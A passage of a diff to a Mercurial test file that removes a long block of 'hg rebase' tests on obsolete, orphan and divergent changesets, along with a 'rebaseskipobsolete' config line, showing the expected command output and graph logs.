1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a cf44d2f5a9f4297a62be94cbdd3dff7c7dc54258 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 7c6027df6a99d93f461868e5433f63bde20b6dfb 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 
'rebase', 'user': 'test'} - -Test that rewriting leaving instability behind is allowed ---------------------------------------------------------------------- - - $ hg log -r 'children(8)' - 9:cf44d2f5a9f4 D (no-eol) - $ hg rebase -r 8 - rebasing 8:e273c5e7d2d2 "C" - 1 new orphan changesets - $ hg log -G - o 11:0d8f238b634c C - | - o 10:7c6027df6a99 B - | - | * 9:cf44d2f5a9f4 D - | | - | x 8:e273c5e7d2d2 C (rewritten using rebase as 11:0d8f238b634c) - | | - @ | 7:02de42196ebe H - | | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ cd .. - $ cp -R hidden stabilize - $ cd stabilize - $ hg rebase --auto-orphans '0::' -d 10 - abort: cannot specify both --auto-orphans and --dest - [10] - $ hg rebase --auto-orphans '0::' - rebasing 9:cf44d2f5a9f4 "D" - $ hg log -G - o 12:7e3935feaa68 D - | - o 11:0d8f238b634c C - | - o 10:7c6027df6a99 B - | - @ 7:02de42196ebe H - | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - - $ cd ../hidden - $ rm -r ../stabilize - -Test multiple root handling ------------------------------------- - - $ hg rebase --dest 4 --rev '7+11+9' - rebasing 9:cf44d2f5a9f4 "D" - rebasing 7:02de42196ebe "H" - rebasing 11:0d8f238b634c tip "C" - $ hg log -G - o 14:1e8370e38cca C - | - @ 13:bfe264faf697 H - | - | o 12:102b4c1d889b D - |/ - | * 10:7c6027df6a99 B - | | - | x 7:02de42196ebe H (rewritten using rebase as 13:bfe264faf697) - | | - +---o 6:eea13746799a G - | |/ - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ cd .. 
- -Detach both parents - - $ hg init double-detach - $ cd double-detach - - $ hg debugdrawdag <<EOF - > F - > /| - > C E - > | | - > B D G - > \|/ - > A - > EOF - - $ hg rebase -d G -r 'B + D + F' - rebasing 1:112478962961 B "B" - rebasing 2:b18e25de2cf5 D "D" - rebasing 6:f15c3adaf214 F tip "F" - abort: cannot rebase 6:f15c3adaf214 without moving at least one of its parents - [255] - - $ cd .. - -test on rebase dropping a merge - -(setup) - - $ hg init dropmerge - $ cd dropmerge - $ hg unbundle "$TESTDIR/bundles/rebase.hg" - adding changesets - adding manifests - adding file changes - added 8 changesets with 7 changes to 7 files (+2 heads) - new changesets cd010b8cd998:02de42196ebe (8 drafts) - (run 'hg heads' to see heads, 'hg merge' to merge) - $ hg up 3 - 4 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ hg merge 7 - 2 files updated, 0 files merged, 0 files removed, 0 files unresolved - (branch merge, don't forget to commit) - $ hg ci -m 'M' - $ echo I > I - $ hg add I - $ hg ci -m I - $ hg log -G - @ 9:4bde274eefcf I - | - o 8:53a6a128b2b7 M - |\ - | o 7:02de42196ebe H - | | - | | o 6:eea13746799a G - | |/| - | o | 5:24b6387c8c8c F - | | | - | | o 4:9520eea781bc E - | |/ - o | 3:32af7686d403 D - | | - o | 2:5fddd98957c8 C - | | - o | 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - -(actual test) - - $ hg rebase --dest 6 --rev '((desc(H) + desc(D))::) - desc(M)' - rebasing 3:32af7686d403 "D" - rebasing 7:02de42196ebe "H" - rebasing 9:4bde274eefcf tip "I" - 1 new orphan changesets - $ hg log -G - @ 12:acd174b7ab39 I - | - o 11:6c11a6218c97 H - | - | o 10:b5313c85b22e D - |/ - | * 8:53a6a128b2b7 M - | |\ - | | x 7:02de42196ebe H (rewritten using rebase as 11:6c11a6218c97) - | | | - o---+ 6:eea13746799a G - | | | - | | o 5:24b6387c8c8c F - | | | - o---+ 4:9520eea781bc E - / / - x | 3:32af7686d403 D (rewritten using rebase as 10:b5313c85b22e) - | | - o | 2:5fddd98957c8 C - | | - o | 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - -Test hidden 
changesets in the rebase set (issue4504) - - $ hg up --hidden 9 - 3 files updated, 0 files merged, 1 files removed, 0 files unresolved - updated to hidden changeset 4bde274eefcf - (hidden revision '4bde274eefcf' was rewritten as: acd174b7ab39) - $ echo J > J - $ hg add J - $ hg commit -m J - 1 new orphan changesets - $ hg debugobsolete `hg log --rev . -T '{node}'` - 1 new obsolescence markers - obsoleted 1 changesets - - $ hg rebase --rev .~1::. --dest 'max(desc(D))' --traceback --config experimental.rebaseskipobsolete=off - rebasing 9:4bde274eefcf "I" - rebasing 13:06edfc82198f tip "J" - 2 new content-divergent changesets - $ hg log -G - @ 15:5ae8a643467b J - | - * 14:9ad579b4a5de I - | - | * 12:acd174b7ab39 I - | | - | o 11:6c11a6218c97 H - | | - o | 10:b5313c85b22e D - |/ - | * 8:53a6a128b2b7 M - | |\ - | | x 7:02de42196ebe H (rewritten using rebase as 11:6c11a6218c97) - | | | - o---+ 6:eea13746799a G - | | | - | | o 5:24b6387c8c8c F - | | | - o---+ 4:9520eea781bc E - / / - x | 3:32af7686d403 D (rewritten using rebase as 10:b5313c85b22e) - | | - o | 2:5fddd98957c8 C - | | - o | 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ hg up 14 -C - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "K" > K - $ hg add K - $ hg commit --amend -m "K" - 1 new orphan changesets - $ echo "L" > L - $ hg add L - $ hg commit -m "L" - $ hg up '.^' - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "M" > M - $ hg add M - $ hg commit --amend -m "M" - 1 new orphan changesets - $ hg log -G - @ 18:bfaedf8eb73b M - | - | * 17:97219452e4bd L - | | - | x 16:fc37a630c901 K (rewritten using amend as 18:bfaedf8eb73b) - |/ - | * 15:5ae8a643467b J - | | - | x 14:9ad579b4a5de I (rewritten using amend as 16:fc37a630c901) - |/ - | * 12:acd174b7ab39 I - | | - | o 11:6c11a6218c97 H - | | - o | 10:b5313c85b22e D - |/ - | * 8:53a6a128b2b7 M - | |\ - | | x 7:02de42196ebe H (rewritten using rebase as 11:6c11a6218c97) - | | | - o---+ 6:eea13746799a 
G - | | | - | | o 5:24b6387c8c8c F - | | | - o---+ 4:9520eea781bc E - / / - x | 3:32af7686d403 D (rewritten using rebase as 10:b5313c85b22e) - | | - o | 2:5fddd98957c8 C - | | - o | 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ hg rebase -s 14 -d 17 --config experimental.rebaseskipobsolete=True - note: not rebasing 14:9ad579b4a5de "I", already in destination as 16:fc37a630c901 "K" - rebasing 15:5ae8a643467b "J" - 1 new orphan changesets - - $ cd .. - -Skip obsolete changeset even with multiple hops ------------------------------------------------ - -setup - - $ hg init obsskip - $ cd obsskip - $ cat << EOF >> .hg/hgrc - > [experimental] - > rebaseskipobsolete = True - > [extensions] - > strip = - > EOF - $ echo A > A - $ hg add A - $ hg commit -m A - $ echo B > B - $ hg add B - $ hg commit -m B0 - $ hg commit --amend -m B1 - $ hg commit --amend -m B2 - $ hg up --hidden 'desc(B0)' - 0 files updated, 0 files merged, 0 files removed, 0 files unresolved - updated to hidden changeset a8b11f55fb19 - (hidden revision 'a8b11f55fb19' was rewritten as: 261e70097290) - $ echo C > C - $ hg add C - $ hg commit -m C - 1 new orphan changesets - $ hg log -G - @ 4:212cb178bcbb C - | - | o 3:261e70097290 B2 - | | - x | 1:a8b11f55fb19 B0 (rewritten using amend as 3:261e70097290) - |/ - o 0:4a2df7238c3b A - - -Rebase finds its way in a chain of marker - - $ hg rebase -d 'desc(B2)' - note: not rebasing 1:a8b11f55fb19 "B0", already in destination as 3:261e70097290 "B2" - rebasing 4:212cb178bcbb tip "C" - -Even when the chain include missing node - - $ hg up --hidden 'desc(B0)' - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - updated to hidden changeset a8b11f55fb19 - (hidden revision 'a8b11f55fb19' was rewritten as: 261e70097290) - $ echo D > D - $ hg add D - $ hg commit -m D - 1 new orphan changesets - $ hg --hidden strip -r 'desc(B1)' - saved backup bundle to $TESTTMP/obsskip/.hg/strip-backup/86f6414ccda7-b1c452ee-backup.hg - 1 new orphan changesets - $ hg 
log -G - @ 5:1a79b7535141 D - | - | o 4:ff2c4d47b71d C - | | - | o 2:261e70097290 B2 - | | - x | 1:a8b11f55fb19 B0 (rewritten using amend as 2:261e70097290) - |/ - o 0:4a2df7238c3b A - - - $ hg rebase -d 'desc(B2)' - note: not rebasing 1:a8b11f55fb19 "B0", already in destination as 2:261e70097290 "B2" - rebasing 5:1a79b7535141 tip "D" - $ hg up 4 - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "O" > O - $ hg add O - $ hg commit -m O - $ echo "P" > P - $ hg add P - $ hg commit -m P - $ hg log -G - @ 8:8d47583e023f P - | - o 7:360bbaa7d3ce O - | - | o 6:9c48361117de D - | | - o | 4:ff2c4d47b71d C - |/ - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - $ hg debugobsolete `hg log -r 7 -T '{node}\n'` --config experimental.evolution=true - 1 new obsolescence markers - obsoleted 1 changesets - 1 new orphan changesets - $ hg rebase -d 6 -r "4::" - rebasing 4:ff2c4d47b71d "C" - note: not rebasing 7:360bbaa7d3ce "O", it has no successor - rebasing 8:8d47583e023f tip "P" - -If all the changeset to be rebased are obsolete and present in the destination, we -should display a friendly error message - - $ hg log -G - @ 10:121d9e3bc4c6 P - | - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - - $ hg up 9 - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "non-relevant change" > nonrelevant - $ hg add nonrelevant - $ hg commit -m nonrelevant - created new head - $ hg debugobsolete `hg log -r 11 -T '{node}\n'` --config experimental.evolution=true - 1 new obsolescence markers - obsoleted 1 changesets - $ hg log -G - @ 11:f44da1f4954c nonrelevant (pruned) - | - | o 10:121d9e3bc4c6 P - |/ - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - $ hg rebase -r . 
-d 10 - note: not rebasing 11:f44da1f4954c tip "nonrelevant", it has no successor - -If a rebase is going to create divergence, it should abort - - $ hg log -G - @ 10:121d9e3bc4c6 P - | - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - - $ hg up 9 - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "john" > doe - $ hg add doe - $ hg commit -m "john doe" - created new head - $ hg up 10 - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "foo" > bar - $ hg add bar - $ hg commit --amend -m "10'" - $ hg up 10 --hidden - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - updated to hidden changeset 121d9e3bc4c6 - (hidden revision '121d9e3bc4c6' was rewritten as: 77d874d096a2) - $ echo "bar" > foo - $ hg add foo - $ hg commit -m "bar foo" - 1 new orphan changesets - $ hg log -G - @ 14:73568ab6879d bar foo - | - | o 13:77d874d096a2 10' - | | - | | o 12:3eb461388009 john doe - | |/ - x | 10:121d9e3bc4c6 P (rewritten using amend as 13:77d874d096a2) - |/ - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - $ hg summary - parent: 14:73568ab6879d tip (orphan) - bar foo - branch: default - commit: (clean) - update: 2 new changesets, 3 branch heads (merge) - phases: 8 draft - orphan: 1 changesets - $ hg rebase -s 10 -d 12 - abort: this rebase will cause divergences from: 121d9e3bc4c6 - (to force the rebase please set experimental.evolution.allowdivergence=True) - [255] - $ hg log -G - @ 14:73568ab6879d bar foo - | - | o 13:77d874d096a2 10' - | | - | | o 12:3eb461388009 john doe - | |/ - x | 10:121d9e3bc4c6 P (rewritten using amend as 13:77d874d096a2) - |/ - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - -With experimental.evolution.allowdivergence=True, rebase can create divergence - - $ hg rebase -s 10 -d 12 --config 
experimental.evolution.allowdivergence=True - rebasing 10:121d9e3bc4c6 "P" - rebasing 14:73568ab6879d tip "bar foo" - 2 new content-divergent changesets - $ hg summary - parent: 16:61bd55f69bc4 tip - bar foo - branch: default - commit: (clean) - update: 1 new changesets, 2 branch heads (merge) - phases: 8 draft - content-divergent: 2 changesets - -rebase --continue + skipped rev because their successors are in destination -we make a change in trunk and work on conflicting changes to make rebase abort. - - $ hg log -G -r 16:: - @ 16:61bd55f69bc4 bar foo - | - ~ - -Create the two changes in trunk - $ printf "a" > willconflict - $ hg add willconflict - $ hg commit -m "willconflict first version" - - $ printf "dummy" > C - $ hg commit -m "dummy change successor" - -Create the changes that we will rebase - $ hg update -C 16 -q - $ printf "b" > willconflict - $ hg add willconflict - $ hg commit -m "willconflict second version" - created new head - $ printf "dummy" > K - $ hg add K - $ hg commit -m "dummy change" - $ printf "dummy" > L - $ hg add L - $ hg commit -m "dummy change" - $ hg debugobsolete `hg log -r ".^" -T '{node}'` `hg log -r 18 -T '{node}'` --config experimental.evolution=true - 1 new obsolescence markers - obsoleted 1 changesets - 1 new orphan changesets - - $ hg log -G -r 16:: - @ 21:7bdc8a87673d dummy change - | - x 20:8b31da3c4919 dummy change (rewritten as 18:601db7a18f51) - | - o 19:b82fb57ea638 willconflict second version - | - | o 18:601db7a18f51 dummy change successor - | | - | o 17:357ddf1602d5 willconflict first version - |/ - o 16:61bd55f69bc4 bar foo - | - ~ - $ hg rebase -r ".^^ + .^ + ." -d 18 - rebasing 19:b82fb57ea638 "willconflict second version" - merging willconflict - warning: conflicts while merging willconflict! 
(edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - - $ hg resolve --mark willconflict - (no more unresolved files) - continue: hg rebase --continue - $ hg rebase --continue - rebasing 19:b82fb57ea638 "willconflict second version" - note: not rebasing 20:8b31da3c4919 "dummy change", already in destination as 18:601db7a18f51 "dummy change successor" - rebasing 21:7bdc8a87673d tip "dummy change" - $ cd .. - -Divergence cases due to obsolete changesets -------------------------------------------- - -We should ignore branches with unstable changesets when they are based on an -obsolete changeset which successor is in rebase set. - - $ hg init divergence - $ cd divergence - $ cat >> .hg/hgrc << EOF - > [extensions] - > strip = - > [alias] - > strip = strip --no-backup --quiet - > [templates] - > instabilities = '{rev}:{node|short} {desc|firstline}{if(instabilities," ({instabilities})")}\n' - > EOF - - $ hg debugdrawdag <<EOF - > e f - > | | - > d' d # replace: d -> d' - > \ / - > c - > | - > x b - > \| - > a - > EOF - 1 new orphan changesets - $ hg log -G -r 'a':: - * 7:1143e9adc121 f - | - | o 6:d60ebfa0f1cb e - | | - | o 5:027ad6c5830d d' - | | - x | 4:76be324c128b d (rewritten using replace as 5:027ad6c5830d) - |/ - o 3:a82ac2b38757 c - | - | o 2:630d7c95eff7 x - | | - o | 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - -Changeset d and its descendants are excluded to avoid divergence of d, which -would occur because the successor of d (d') is also in rebaseset. As a -consequence f (descendant of d) is left behind. 
- - $ hg rebase -b 'e' -d 'x' - rebasing 1:488e1b7e7341 b "b" - rebasing 3:a82ac2b38757 c "c" - rebasing 5:027ad6c5830d d' "d'" - rebasing 6:d60ebfa0f1cb e "e" - note: not rebasing 4:76be324c128b d "d" and its descendants as this would cause divergence - $ hg log -G -r 'a':: - o 11:eb6d63fc4ed5 e - | - o 10:44d8c724a70c d' - | - o 9:d008e6b4d3fd c - | - o 8:67e8f4a16c49 b - | - | * 7:1143e9adc121 f - | | - | | x 6:d60ebfa0f1cb e (rewritten using rebase as 11:eb6d63fc4ed5) - | | | - | | x 5:027ad6c5830d d' (rewritten using rebase as 10:44d8c724a70c) - | | | - | x | 4:76be324c128b d (rewritten using replace as 5:027ad6c5830d) - | |/ - | x 3:a82ac2b38757 c (rewritten using rebase as 9:d008e6b4d3fd) - | | - o | 2:630d7c95eff7 x - | | - | x 1:488e1b7e7341 b (rewritten using rebase as 8:67e8f4a16c49) - |/ - o 0:b173517d0057 a - - $ hg strip -r 8: - $ hg log -G -r 'a':: - * 7:1143e9adc121 f - | - | o 6:d60ebfa0f1cb e - | | - | o 5:027ad6c5830d d' - | | - x | 4:76be324c128b d (rewritten using replace as 5:027ad6c5830d) - |/ - o 3:a82ac2b38757 c - | - | o 2:630d7c95eff7 x - | | - o | 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - -If the rebase set has an obsolete (d) with a successor (d') outside the rebase -set and none in destination, we still get the divergence warning. -By allowing divergence, we can perform the rebase. 
- - $ hg rebase -r 'c'::'f' -d 'x' - abort: this rebase will cause divergences from: 76be324c128b - (to force the rebase please set experimental.evolution.allowdivergence=True) - [255] - $ hg rebase --config experimental.evolution.allowdivergence=true -r 'c'::'f' -d 'x' - rebasing 3:a82ac2b38757 c "c" - rebasing 4:76be324c128b d "d" - rebasing 7:1143e9adc121 f tip "f" - 1 new orphan changesets - 2 new content-divergent changesets - $ hg log -G -r 'a':: -T instabilities - o 10:e1744ea07510 f - | - * 9:e2b36ea9a0a0 d (content-divergent) - | - o 8:6a0376de376e c - | - | x 7:1143e9adc121 f - | | - | | * 6:d60ebfa0f1cb e (orphan) - | | | - | | * 5:027ad6c5830d d' (orphan content-divergent) - | | | - | x | 4:76be324c128b d - | |/ - | x 3:a82ac2b38757 c - | | - o | 2:630d7c95eff7 x - | | - | o 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - $ hg strip -r 8: - -(Not skipping obsoletes means that divergence is allowed.) - - $ hg rebase --config experimental.rebaseskipobsolete=false -r 'c'::'f' -d 'x' - rebasing 3:a82ac2b38757 c "c" - rebasing 4:76be324c128b d "d" - rebasing 7:1143e9adc121 f tip "f" - 1 new orphan changesets - 2 new content-divergent changesets - - $ hg strip -r 0: - -Similar test on a more complex graph - - $ hg debugdrawdag <<EOF - > g - > | - > f e - > | | - > e' d # replace: e -> e' - > \ / - > c - > | - > x b - > \| - > a - > EOF - 1 new orphan changesets - $ hg log -G -r 'a': - * 8:2876ce66c6eb g - | - | o 7:3ffec603ab53 f - | | - x | 6:e36fae928aec e (rewritten using replace as 5:63324dc512ea) - | | - | o 5:63324dc512ea e' - | | - o | 4:76be324c128b d - |/ - o 3:a82ac2b38757 c - | - | o 2:630d7c95eff7 x - | | - o | 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - $ hg rebase -b 'f' -d 'x' - rebasing 1:488e1b7e7341 b "b" - rebasing 3:a82ac2b38757 c "c" - rebasing 5:63324dc512ea e' "e'" - rebasing 7:3ffec603ab53 f "f" - rebasing 4:76be324c128b d "d" - note: not rebasing 6:e36fae928aec e "e" and its descendants as this would cause divergence - $ hg log -G 
-r 'a': - o 13:a1707a5b7c2c d - | - | o 12:ef6251596616 f - | | - | o 11:b6f172e64af9 e' - |/ - o 10:d008e6b4d3fd c - | - o 9:67e8f4a16c49 b - | - | * 8:2876ce66c6eb g - | | - | | x 7:3ffec603ab53 f (rewritten using rebase as 12:ef6251596616) - | | | - | x | 6:e36fae928aec e (rewritten using replace as 5:63324dc512ea) - | | | - | | x 5:63324dc512ea e' (rewritten using rebase as 11:b6f172e64af9) - | | | - | x | 4:76be324c128b d (rewritten using rebase as 13:a1707a5b7c2c) - | |/ - | x 3:a82ac2b38757 c (rewritten using rebase as 10:d008e6b4d3fd) - | | - o | 2:630d7c95eff7 x - | | - | x 1:488e1b7e7341 b (rewritten using rebase as 9:67e8f4a16c49) - |/ - o 0:b173517d0057 a - - -issue5782 - $ hg strip -r 0: - $ hg debugdrawdag <<EOF - > d - > | - > c1 c # replace: c -> c1 - > \ / - > b - > | - > a - > EOF - 1 new orphan changesets - $ hg debugobsolete `hg log -T "{node}" --hidden -r 'desc("c1")'` - 1 new obsolescence markers - obsoleted 1 changesets - $ hg log -G -r 'a': --hidden - * 4:76be324c128b d - | - | x 3:ef8a456de8fa c1 (pruned) - | | - x | 2:a82ac2b38757 c (rewritten using replace as 3:ef8a456de8fa) - |/ - o 1:488e1b7e7341 b - | - o 0:b173517d0057 a - - $ hg rebase -d 0 -r 2 - rebasing 2:a82ac2b38757 c "c" - $ hg log -G -r 'a': --hidden - o 5:69ad416a4a26 c - | - | * 4:76be324c128b d - | | - | | x 3:ef8a456de8fa c1 (pruned) - | | | - | x | 2:a82ac2b38757 c (rewritten using replace as 3:ef8a456de8fa rewritten using rebase as 5:69ad416a4a26) - | |/ - | o 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - $ cd .. 
- -Rebase merge where successor of one parent is equal to destination (issue5198) - - $ hg init p1-succ-is-dest - $ cd p1-succ-is-dest - - $ hg debugdrawdag <<EOF - > F - > /| - > E D B # replace: D -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d B -s D - note: not rebasing 2:b18e25de2cf5 D "D", already in destination as 1:112478962961 B "B" - rebasing 4:66f1a38021c9 F tip "F" - $ hg log -G - o 5:50e9d60b99c6 F - |\ - | | x 4:66f1a38021c9 F (rewritten using rebase as 5:50e9d60b99c6) - | |/| - | o | 3:7fb047a69f22 E - | | | - | | x 2:b18e25de2cf5 D (rewritten using replace as 1:112478962961) - | |/ - o | 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where successor of other parent is equal to destination - - $ hg init p2-succ-is-dest - $ cd p2-succ-is-dest - - $ hg debugdrawdag <<EOF - > F - > /| - > E D B # replace: E -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d B -s E - note: not rebasing 3:7fb047a69f22 E "E", already in destination as 1:112478962961 B "B" - rebasing 4:66f1a38021c9 F tip "F" - $ hg log -G - o 5:aae1787dacee F - |\ - | | x 4:66f1a38021c9 F (rewritten using rebase as 5:aae1787dacee) - | |/| - | | x 3:7fb047a69f22 E (rewritten using replace as 1:112478962961) - | | | - | o | 2:b18e25de2cf5 D - | |/ - o / 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. 
- -Rebase merge where successor of one parent is ancestor of destination - - $ hg init p1-succ-in-dest - $ cd p1-succ-in-dest - - $ hg debugdrawdag <<EOF - > F C - > /| | - > E D B # replace: D -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d C -s D - note: not rebasing 2:b18e25de2cf5 D "D", already in destination as 1:112478962961 B "B" - rebasing 5:66f1a38021c9 F tip "F" - - $ hg log -G - o 6:0913febf6439 F - |\ - +---x 5:66f1a38021c9 F (rewritten using rebase as 6:0913febf6439) - | | | - | o | 4:26805aba1e60 C - | | | - o | | 3:7fb047a69f22 E - | | | - +---x 2:b18e25de2cf5 D (rewritten using replace as 1:112478962961) - | | - | o 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where successor of other parent is ancestor of destination - - $ hg init p2-succ-in-dest - $ cd p2-succ-in-dest - - $ hg debugdrawdag <<EOF - > F C - > /| | - > E D B # replace: E -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d C -s E - note: not rebasing 3:7fb047a69f22 E "E", already in destination as 1:112478962961 B "B" - rebasing 5:66f1a38021c9 F tip "F" - $ hg log -G - o 6:c6ab0cc6d220 F - |\ - +---x 5:66f1a38021c9 F (rewritten using rebase as 6:c6ab0cc6d220) - | | | - | o | 4:26805aba1e60 C - | | | - | | x 3:7fb047a69f22 E (rewritten using replace as 1:112478962961) - | | | - o---+ 2:b18e25de2cf5 D - / / - o / 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. 
- -Rebase merge where successor of one parent is ancestor of destination - - $ hg init p1-succ-in-dest-b - $ cd p1-succ-in-dest-b - - $ hg debugdrawdag <<EOF - > F C - > /| | - > E D B # replace: E -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d C -b F - rebasing 2:b18e25de2cf5 D "D" - note: not rebasing 3:7fb047a69f22 E "E", already in destination as 1:112478962961 B "B" - rebasing 5:66f1a38021c9 F tip "F" - note: not rebasing 5:66f1a38021c9 F tip "F", its destination already has all its changes - $ hg log -G - o 6:8f47515dda15 D - | - | x 5:66f1a38021c9 F (pruned using rebase) - | |\ - o | | 4:26805aba1e60 C - | | | - | | x 3:7fb047a69f22 E (rewritten using replace as 1:112478962961) - | | | - | x | 2:b18e25de2cf5 D (rewritten using rebase as 6:8f47515dda15) - | |/ - o / 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where successor of other parent is ancestor of destination - - $ hg init p2-succ-in-dest-b - $ cd p2-succ-in-dest-b - - $ hg debugdrawdag <<EOF - > F C - > /| | - > E D B # replace: D -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d C -b F - note: not rebasing 2:b18e25de2cf5 D "D", already in destination as 1:112478962961 B "B" - rebasing 3:7fb047a69f22 E "E" - rebasing 5:66f1a38021c9 F tip "F" - note: not rebasing 5:66f1a38021c9 F tip "F", its destination already has all its changes - - $ hg log -G - o 6:533690786a86 E - | - | x 5:66f1a38021c9 F (pruned using rebase) - | |\ - o | | 4:26805aba1e60 C - | | | - | | x 3:7fb047a69f22 E (rewritten using rebase as 6:533690786a86) - | | | - | x | 2:b18e25de2cf5 D (rewritten using replace as 1:112478962961) - | |/ - o / 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. 
- -Rebase merge where extinct node has successor that is not an ancestor of -destination - - $ hg init extinct-with-succ-not-in-dest - $ cd extinct-with-succ-not-in-dest - - $ hg debugdrawdag <<EOF - > E C # replace: C -> E - > | | - > D B - > |/ - > A - > EOF - - $ hg rebase -d D -s B - rebasing 1:112478962961 B "B" - note: not rebasing 3:26805aba1e60 C "C" and its descendants as this would cause divergence - - $ cd .. - - $ hg init p2-succ-in-dest-c - $ cd p2-succ-in-dest-c - -The scenario here was that B::D were developed on default. B was queued on -stable, but amended before being push to hg-committed. C was queued on default, -along with unrelated J. - - $ hg debugdrawdag <<EOF - > J - > | - > F - > | - > E - > | D - > | | - > | C # replace: C -> F - > | | H I # replace: B -> H -> I - > | B |/ - > |/ G - > A - > EOF - 1 new orphan changesets - -This strip seems to be the key to avoid an early divergence warning. - $ hg --config extensions.strip= --hidden strip -qr H - 1 new orphan changesets - - $ hg rebase -b 'desc("D")' -d 'desc("J")' - abort: this rebase will cause divergences from: 112478962961 - (to force the rebase please set experimental.evolution.allowdivergence=True) - [255] - -Rebase merge where both parents have successors in destination - - $ hg init p12-succ-in-dest - $ cd p12-succ-in-dest - $ hg debugdrawdag <<'EOS' - > E F - > /| /| # replace: A -> C - > A B C D # replace: B -> D - > | | - > X Y - > EOS - 1 new orphan changesets - $ hg rebase -r A+B+E -d F - note: not rebasing 4:a3d17304151f A "A", already in destination as 0:96cc3511f894 C "C" - note: not rebasing 5:b23a2cc00842 B "B", already in destination as 1:058c1e1fb10a D "D" - rebasing 7:dac5d11c5a7d E tip "E" - abort: rebasing 7:dac5d11c5a7d will include unwanted changes from 3:59c792af609c, 5:b23a2cc00842 or 2:ba2b7fa7166d, 4:a3d17304151f - [255] - $ cd .. - -Rebase a non-clean merge. One parent has successor in destination, the other -parent moves as requested. 
- - $ hg init p1-succ-p2-move - $ cd p1-succ-p2-move - $ hg debugdrawdag <<'EOS' - > D Z - > /| | # replace: A -> C - > A B C # D/D = D - > EOS - 1 new orphan changesets - $ hg rebase -r A+B+D -d Z - note: not rebasing 0:426bada5c675 A "A", already in destination as 2:96cc3511f894 C "C" - rebasing 1:fc2b737bb2e5 B "B" - rebasing 3:b8ed089c80ad D "D" - - $ rm .hg/localtags - $ hg log -G - o 6:e4f78693cc88 D - | - o 5:76840d832e98 B - | - o 4:50e41c1f3950 Z - | - o 2:96cc3511f894 C - - $ hg files -r tip - B - C - D - Z - - $ cd .. - - $ hg init p1-move-p2-succ - $ cd p1-move-p2-succ - $ hg debugdrawdag <<'EOS' - > D Z - > /| | # replace: B -> C - > A B C # D/D = D - > EOS - 1 new orphan changesets - $ hg rebase -r B+A+D -d Z - rebasing 0:426bada5c675 A "A" - note: not rebasing 1:fc2b737bb2e5 B "B", already in destination as 2:96cc3511f894 C "C" - rebasing 3:b8ed089c80ad D "D" - - $ rm .hg/localtags - $ hg log -G - o 6:1b355ed94d82 D - | - o 5:a81a74d764a6 A - | - o 4:50e41c1f3950 Z - | - o 2:96cc3511f894 C - - $ hg files -r tip - A - C - D - Z - - $ cd .. - Test that bookmark is moved and working dir is updated when all changesets have equivalents in destination $ hg init rbsrepo && cd rbsrepo $ echo "[experimental]" > .hg/hgrc $ echo "evolution=true" >> .hg/hgrc - $ echo "rebaseskipobsolete=on" >> .hg/hgrc $ echo root > root && hg ci -Am root adding root $ echo a > a && hg ci -Am a @@ -1759,30 +123,24 @@ / o 0:426bada5c675 A -For some reasons (--hidden, rebaseskipobsolete=0, directaccess, etc.), +For some reasons (--hidden, directaccess, etc.), rebasestate may contain hidden hashes. "rebase --abort" should work regardless. 
